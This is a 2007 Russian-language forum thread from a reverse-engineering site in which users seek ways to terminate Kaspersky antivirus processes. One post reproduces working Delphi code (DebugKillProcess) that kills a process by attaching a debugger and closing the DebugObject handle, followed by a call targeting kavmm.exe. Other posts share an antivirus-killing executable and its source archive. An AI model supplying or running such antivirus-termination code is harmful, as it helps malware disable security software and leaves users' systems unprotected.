Сейчас на форуме: zombi-vadim, tyns777 (+5 невидимых)

 eXeL@B —› Программирование —› Завершить процесс KIS'a
. 1 . 2 . >>
Посл.ответ Сообщение


Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 09:31
· Личное сообщение · #1

Собственно как?

Сразу хочу оговориться, что пишу не трой, а прогу которая должна:
1) гасить каспера
2) удалять 2 ветки реестра
3) запускать каспера.
вот с первым пунктом и возникла проблема.

На системные запросы он не отвечает, даже со всеми привилегиями.

-----
iNTERNATiONAL CoDE CReW





Ранг: 631.1 (!), 62thx
Активность: 0.370.01
Статус: Участник
Автор VB Decompiler

Создано: 06 декабря 2007 09:33 · Поправил: GPcH
· Личное сообщение · #2

habrahabr.ru/blog/infosecurity/29853.html

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 09:37
· Личное сообщение · #3

GPcH
Спасибо за информацию, но ведь там говориться о отключении защиты, а мне нужно чтобы завершился процесс avp.exe

-----
iNTERNATiONAL CoDE CReW





Ранг: 631.1 (!), 62thx
Активность: 0.370.01
Статус: Участник
Автор VB Decompiler

Создано: 06 декабря 2007 09:39
· Личное сообщение · #4

Spirit пишет:
Спасибо за информацию, но ведь там говориться о отключении защиты, а мне нужно чтобы завершился процесс avp.exe


Сорри не тот топик - читай выше. Просто как то на antimalvare натолкнулся на статью что выше.

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 09:48
· Личное сообщение · #5

GPcH
Огромнейшее спасибо, узнал много нового и интересного.
Теперь вот появилась пища для раздумий, нафига я юзаю такой дырявый авер =)

-----
iNTERNATiONAL CoDE CReW





Ранг: 631.1 (!), 62thx
Активность: 0.370.01
Статус: Участник
Автор VB Decompiler

Создано: 06 декабря 2007 09:52
· Личное сообщение · #6

Да я сам когда на эту статью наткнулся был не в восторге.
Хотя я этот авер и не юзаю.
Но в восьмерке обещают все исправить + ускорить работу за счет использования многопоточности.

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 09:59
· Личное сообщение · #7

хзхз
Я ставил себе восьмерку альфа2, он у меня страшно тормозил систему и кидал БСОДы.
Так что пока не выйдет нормальный релиз я больше эксперементировать не буду.

-----
iNTERNATiONAL CoDE CReW





Ранг: 107.3 (ветеран), 5thx
Активность: 0.20.04
Статус: Участник

Создано: 06 декабря 2007 10:02
· Личное сообщение · #8

вот прога она может гасить каспера....
где-то были исходники но я не могу найти

81cf_05.12.2007_CRACKLAB.rU.tgz - Killer.exe




Ранг: 111.1 (ветеран)
Активность: 0.040
Статус: Участник

Создано: 06 декабря 2007 10:07
· Личное сообщение · #9

Spirit
Попробуй здесь посмотри. Я по этой статье убивал Касперского.
ТЫЦ http://www.wasm.ru/article.php?article=apihook_2

-----
The truth is out of there...





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 10:10
· Личное сообщение · #10

Lumen
И у тебя получилось?
Я быстренько просмотрел код, вроде используются примитивные функции...

-----
iNTERNATiONAL CoDE CReW





Ранг: 111.1 (ветеран)
Активность: 0.040
Статус: Участник

Создано: 06 декабря 2007 10:20 · Поправил: Lumen
· Личное сообщение · #11

MS-Rem пишет:
Практическое применение:
Убиваем антивирус Касперского:

{ убивание процесса отладочным методом }
Function DebugKillProcess(ProcessId: dword): boolean;
var
pHandle: dword;
myPID: dword;
HandlesInfo: PSYSTEM_HANDLE_INFORMATION_EX;
r: dword;
begin
Result := false;
myPID := GetCurrentProcessId();
if not EnableDebugPrivilege() then Exit;
//подключаемся к системе отладки и получаем DebugObject
if DbgUiConnectToDbg() <> STATUS_SUCCESS then Exit;
pHandle := OpenProcessEx(ProcessId);
//включаем отладку процесса
if DbgUiDebugActiveProcess(pHandle) <> STATUS_SUCCESS then Exit;
//надо найти полученный DebugObject
HandlesInfo := GetInfoTable(SystemHandleInformation);
if HandlesInfo = nil then Exit;
for r := 0 to HandlesInfo^.NumberOfHandles do
if (HandlesInfo^.Information[r].ProcessId = myPID) and
(HandlesInfo^.Information[r].ObjectTypeNumber = $8) //DebugObject
then begin
//закрываем DebugObject, что приводит к уничтожению отлаживаемого процесса
CloseHandle(HandlesInfo^.Information[r].Handle);
Result := true;
break;
end;
VirtualFree(HandlesInfo, 0, MEM_RELEASE);
end;

После чего антивирус Касперского убивается одной строкой:

DebugKillProcess(GetProcessId('kavmm.exe'));

Также, этим методом можно убить почти любую программу, авторы которой заявляют, что она неубиваемая.

ЗЫ: Я правда не знаю, какая у тебя версия, но шестой каспер этим кодом убивается на ура...

-----
The truth is out of there...





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 11:45 · Поправил: Spirit
· Личное сообщение · #12

[del]

-----
iNTERNATiONAL CoDE CReW




Ранг: 30.2 (посетитель)
Активность: 0.010
Статус: Участник

Создано: 06 декабря 2007 12:22
· Личное сообщение · #13

У кого нибудь есть это же код но на С++ , а то переводить, как -то не хочется изобретать велосипед если это уже кто-то сделал.




Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 06 декабря 2007 12:23
· Личное сообщение · #14

Эх! Не сработало.
Гасит любые процессы, кроме кашперовского.

-----
iNTERNATiONAL CoDE CReW




Ранг: 30.2 (посетитель)
Активность: 0.010
Статус: Участник

Создано: 06 декабря 2007 12:58
· Личное сообщение · #15

Если посмотреть сам источник ( rootkit.com/newsread.php?newsid=778 )
то там как я понял там сначало гасится csrss.exe а потом уже касперовский.



Ранг: 15.5 (новичок)
Активность: 0.010
Статус: Участник

Создано: 06 декабря 2007 13:53
· Личное сообщение · #16

гы
из csrss "достается" хпроцес касперского) а не гасится )




Ранг: 1131.7 (!!!!), 447thx
Активность: 0.670.2
Статус: Участник

Создано: 06 декабря 2007 16:20
· Личное сообщение · #17

undb пишет:
то там как я понял там сначало гасится csrss.exe


гасить csrss.exe - это сильно




Ранг: 279.1 (наставник)
Активность: 0.160
Статус: Участник
wizard

Создано: 06 декабря 2007 16:47
· Личное сообщение · #18

Gideon Vi пишет:
гасить csrss.exe - это сильно


Ну и что получиш ребут компа и после загрузки сообщение ,что система восстановленна после системной ошибки .Какое практическое применение ?

-----
Что один человек сделал , другой всегда сломать может...





Ранг: 1131.7 (!!!!), 447thx
Активность: 0.670.2
Статус: Участник

Создано: 06 декабря 2007 19:17
· Личное сообщение · #19

MACKLIA пишет:
Ну и что получиш ребут компа и после загрузки сообщение ,что система восстановленна после системной ошибки .Какое практическое применение ?


никакого - именно об этом я и сказал. неужели ирония столь незаметна?



Ранг: 55.7 (постоянный), 6thx
Активность: 0.030
Статус: Участник

Создано: 06 декабря 2007 21:26
· Личное сообщение · #20

Magister Yoda пишет:
вот прога она может гасить каспера....

что-то не гаситься каспер ею. даже окно главное закрыть не может (правда манипуляции с ним делает).



Ранг: 47.5 (посетитель)
Активность: 0.030
Статус: Участник

Создано: 07 декабря 2007 04:02
· Личное сообщение · #21

Lumen

Это очень старый код. Убивался только KAV 5.

Evol

Дык, тоько код с rootkits.com может что-то сделать, от остального у KAV\KIS защита уже есть!



Ранг: 228.7 (наставник), 2thx
Активность: 0.120
Статус: Участник
malware research

Создано: 07 декабря 2007 04:47
· Личное сообщение · #22

HellStudent пишет:
тоько код с rootkits.com может что-то сделать, от остального у KAV\KIS защита уже есть!

Это вы так думаете

-----
Research is my purpose





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 07 декабря 2007 06:29
· Личное сообщение · #23

Error_Log
Если у тебя есть идеи, пожалуйста поделись.
А то так хочется дописать прогу...

-----
iNTERNATiONAL CoDE CReW





Ранг: 107.3 (ветеран), 5thx
Активность: 0.20.04
Статус: Участник

Создано: 07 декабря 2007 08:10
· Личное сообщение · #24

я так и не понял прога которую я оттачил не работает?




Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 07 декабря 2007 08:16
· Личное сообщение · #25

Magister Yoda
мне не нужна твоя программа. мне нужен код.

-----
iNTERNATiONAL CoDE CReW





Ранг: 107.3 (ветеран), 5thx
Активность: 0.20.04
Статус: Участник

Создано: 07 декабря 2007 08:44
· Личное сообщение · #26

если она работает то я постараюсь найти код




Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 07 декабря 2007 12:38
· Личное сообщение · #27

Spirit пишет:
мне не нужна твоя программа. мне нужен код.


тыж реверсер, засунул в иду прогу и получил исходник на си

-----
[nice coder and reverser]





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 07 декабря 2007 12:45
· Личное сообщение · #28

Hellspawn
Эмм...а что такое ида и что такое с++?
И еще вопрос, кто такой реверсер?

-----
iNTERNATiONAL CoDE CReW





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 07 декабря 2007 15:22
· Личное сообщение · #29

Эмм...новых идей так и не появилось?

-----
iNTERNATiONAL CoDE CReW





Ранг: 107.3 (ветеран), 5thx
Активность: 0.20.04
Статус: Участник

Создано: 07 декабря 2007 17:13
· Личное сообщение · #30

вот нашёл

950f_07.12.2007_CRACKLAB.rU.tgz - killer-sources.rar


. 1 . 2 . >>
 eXeL@B —› Программирование —› Завершить процесс KIS'a
:: Ваш ответ
Жирный  Курсив  Подчеркнутый  Перечеркнутый  {mpf5}  Код  Вставить ссылку 
:s1: :s2: :s3: :s4: :s5: :s6: :s7: :s8: :s9: :s10: :s11: :s12: :s13: :s14: :s15: :s16:


Максимальный размер аттача: 500KB.
Ваш логин: german1505 » Выход » ЛС
   Для печати Для печати